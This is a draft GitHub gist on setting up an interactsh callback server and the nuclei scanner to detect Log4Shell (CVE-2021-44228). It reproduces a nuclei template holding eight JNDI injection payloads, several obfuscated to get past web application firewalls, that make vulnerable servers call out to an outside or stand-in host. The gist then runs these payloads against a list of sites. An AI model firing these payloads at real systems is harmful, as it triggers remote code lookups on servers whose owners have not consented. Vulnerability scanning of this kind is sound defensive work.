Skip to content

Instantly share code, notes, and snippets.

@mbrownnycnyc

mbrownnycnyc/install_nuclei_on_kali.md

Last active September 11, 2024 06:05
Show Gist options
  • Save mbrownnycnyc/cba1d3aae7b466322437ddfc46a7482c to your computer and use it in GitHub Desktop.
Save mbrownnycnyc/cba1d3aae7b466322437ddfc46a7482c to your computer and use it in GitHub Desktop.
Download ZIP
nuclei install on kali (for log4j stuff).. this is in draft as of 12/17/2021
Raw
install_nuclei_on_kali.md

standup interactsh server on aws ami linux

  1. stand up a domain. In this case, I'll use digiarch.net since I own this and use it for nothing.

  2. stand up an ami linux server. Configure the SG to allow the following inbound (letsencrypt also uses the DNS):

    • tcp 25: SMTP
    • udp 53: DNS
    • tcp 80: HTTP
    • tcp 443: HTTPS
    • tcp 465: SMTPS
    • tcp 587: SMTP STARTTLS

  3. install go and ncat.

    sudo yum groupinstall "Development Tools" -y
sudo yum install nmap-ncat -y
cd /usr/local
sudo wget https://go.dev/dl/go1.17.5.linux-amd64.tar.gz
sudo tar -zxvf go*linux-amd64.tar.gz
sudo echo export PATH=$PATH:/usr/local/go/bin >> /etc/profile.d/go.sh
sudo echo export GOPATH=$HOME/go >> /etc/profile.d/go.sh
source /etc/profile.d/go.sh
go version

  4. install certbot

    yum install pip -y #yea py2 is installed on the AMI I used at least
pip install virtualenv
virtualenv ~/.certbot
source ~/.certbot/bin/activate
pip install 'setuptools<41'
pip install certbot
pip install 'parsedatetime<2.6'
deactivate

  5. Generate a wildcard cert: #note that this is a workaround (see projectdiscovery/interactsh#127 )

    source ~/.certbot/bin/activate
certbot certonly --manual -d *.digiarch.net  --agree-tos \
--no-bootstrap --manual-public-ip-logging-ok --preferred-challenges dns-01 \
-m [email protected]  \
--server https://acme-v02.api.letsencrypt.org/directory

# Create a TXT record with the value set
_acme-challenge.digiarch.net.	900	TXT	"M3Ckm1T-yeanah"

#verify with https://unboundtest.com/

#once verified... continue.  later run `certbot renew` within the python virtualenv.
# /etc/letsencrypt/live/digiarch.net/fullchain.pem
# /etc/letsencrypt/live/digiarch.net/privkey.pem
# leave the virtual env
deactivate
# create a link to a 
ln -s /etc/letsencrypt/live/digiarch.net/fullchain.pem /root/.config/interactsh/cert.crt
ln -s /etc/letsencrypt/live/digiarch.net/privkey.pem /root/.config/interactsh/cert.key

  6. install and configure interactsh client and server

    go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@lates
go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-server@latest

  7. Add two A records in your master zone for ns1 and ns2 to your AWS EC2 instance ip addr.

    • This step and the next two steps only work when the dns-01 letsencrypt verification method works for you.

  8. add two NS records in your master zone to direct to the previously created ns records.

  9. configure TXT record to use let's encrypt

    I use dollardns.net who allows me to edit the BIND config directly:

    digiarch.net.	900	SOA	ns1.dollardns.net. info\@talconst.com. 2021122005 1800 21600 2419200 300
digiarch.net.	172800	NS	ns1.digiarch.net.
digiarch.net.	172800	NS	ns2.digiarch.net.
ns1.digiarch.net.	900	A	3.88.84.84
ns2.digiarch.net.	900	A	3.88.84.84

  10. run interactsh server on the AWS EC2 instance:

    # cert can be configured: "/root/.config/interactsh/cert.crt"
/home/ec2-user/go/bin/interactsh-server -domain digiarch.net -auth -debug -listen-ip $(hostname -i)

install go (on kali)

* https://rafaelhart.com/2020/03/installing-golang-on-kali-linux/
sudo apt install -y golang
echo export PATH=$HOME/go/bin:/usr/lib/go/bin:$PATH >> ~/.bashrc
source ~/.bashrc

install nuclei https://github.com/projectdiscovery/nuclei

go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest

use nuclei

which nuclei
nuclei -h

update templates natively

# this doesn't appear to pull from the repo https://github.com/projectdiscovery/nuclei-templates/search?q=log4j
nuclei update-templates

list log4j related templates

nuclei -tl 2>&1 | egrep '(log4j|log4shell)'
#actually list log4j related templates. el oh el
grep -lr "log4j" ~/nuclei-templates

download a template

curl -O https://raw.githubusercontent.com/toramanemre/log4j-rce-detect-waf-bypass/main/log4j-rce-detect-waf-bypass.yaml -o ~/nuclei-templates/vulnerabilities/

locate the template

nuclei -tl 2>&1 | egrep 'log4j-rce-detect-waf-bypass'

validate the template

nuclei -templates "log4j-rce-detect-waf-bypass" -validate


└─$ cat log4j-rce-detect-waf-bypass.yaml
id: log4j-rce-detect-waf-bypass

info:
  name: Apache Log4j RCE (CVE-2021-44228) Detection with WAF Bypass (CloudFlare etc.)
  author: toramanemre

requests:
  - method: GET
    path:
      - "{{BaseURL}}/?q=${jndi:ldap://{{interactsh-url}}/poc}"
      - "{{BaseURL}}/?q=${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://{{interactsh-url}}poc}"
      - "{{BaseURL}}/?q=${${::-j}ndi:rmi://{{interactsh-url}}/poc}"
      - "{{BaseURL}}/?q=${jndi:rmi://{{interactsh-url}}}"
      - "{{BaseURL}}/?q=${${lower:jndi}:${lower:rmi}://{{interactsh-url}}/poc}"
      - "{{BaseURL}}/?q=${${lower:${lower:jndi}}:${lower:rmi}://{{interactsh-url}}/poc}"
      - "{{BaseURL}}/?q=${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://{{interactsh-url}}/poc}"
      - "{{BaseURL}}/?q=${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://{{interactsh-url}}/poc}"

    headers:
      Host: "{{Host}}"

    matchers:
      - type: word
        part: interactsh_protocol
        name: dns
        words:
          - "dns"

breakdown this template

  1. refer to https://nuclei.projectdiscovery.io/templating-guide/protocols/http/
{{BaseURL}} - This will replace on runtime in the request by the input URL as specified in the target file.
  1. refer to https://nuclei.projectdiscovery.io/templating-guide/interactsh/
Since release of Nuclei v2.3.6, Nuclei supports using the interact.sh API to achieve OOB based vulnerability scanning with automatic Request correlation built in. It's as easy as writing {{interactsh-url}} anywhere in the request, and adding a matcher for interact_protocol. Nuclei will handle correlation of the interaction to the template & the request it was generated from allowing effortless OOB scanning.
  • because we do not trust interact.sh, we will be using an arbitrary domain name, specifically, winter2021notrealnotdomainsquattedredbluegreen.com.
  1. edit the template:
└─$ cat redbluegreenlog4j-rce-detect-waf-bypass.yaml
id: log4j-rce-detect-waf-bypass

info:
  name: Apache Log4j RCE (CVE-2021-44228) Detection with WAF Bypass (CloudFlare etc.)
  author: toramanemre

requests:
  - method: GET
    path:
      - "{{BaseURL}}/?q=${jndi:ldap://winter2021notrealnotdomainsquattedredbluegreen.com/poc}"
      - "{{BaseURL}}/?q=${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://winter2021notrealnotdomainsquattedredbluegreen.compoc}"
      - "{{BaseURL}}/?q=${${::-j}ndi:rmi://winter2021notrealnotdomainsquattedredbluegreen.com/poc}"
      - "{{BaseURL}}/?q=${jndi:rmi://winter2021notrealnotdomainsquattedredbluegreen.com}"
      - "{{BaseURL}}/?q=${${lower:jndi}:${lower:rmi}://winter2021notrealnotdomainsquattedredbluegreen.com/poc}"
      - "{{BaseURL}}/?q=${${lower:${lower:jndi}}:${lower:rmi}://winter2021notrealnotdomainsquattedredbluegreen.com/poc}"
      - "{{BaseURL}}/?q=${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://winter2021notrealnotdomainsquattedredbluegreen.com/poc}"
      - "{{BaseURL}}/?q=${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://winter2021notrealnotdomainsquattedredbluegreen.com/poc}"

    headers:
      Host: "{{Host}}"

    matchers:
      - type: word
        part: interactsh_protocol
        name: dns
        words:
          - "dns"

execute the template

  1. generate a list of sites and pop them into a file
https://fqdnone.com
https://fqdntwo.com
  1. execute
nuclei -t ~/nuclei-templates/vulnerabilities/redbluegreenlog4j-rce-detect-waf-bypass.yaml -l fqdns.txt -debug -vv
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment